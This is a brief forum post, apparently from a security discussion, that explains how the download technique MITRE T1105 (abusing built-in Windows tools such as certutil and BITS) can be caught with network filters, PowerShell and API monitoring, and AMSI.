Usually Ingress Tool Transfer translates to abuse of LOLBins, turning them into puppets to download malicious content. This can be blocked with network filters without a doubt, but can also be achieved via PowerShell monitoring (they may try downloading via BITS, IEX and others). Or they may use techniques such as process hollowing, abusing certutil and others. By monitoring API and LOLBin calls and by plugging in to the AMSI you can detect these even without network filter.
[URL unfurl="true"]https://attack.mitre.org/techniques/T1105/[/URL]
But of course, if you have network filters, even better.
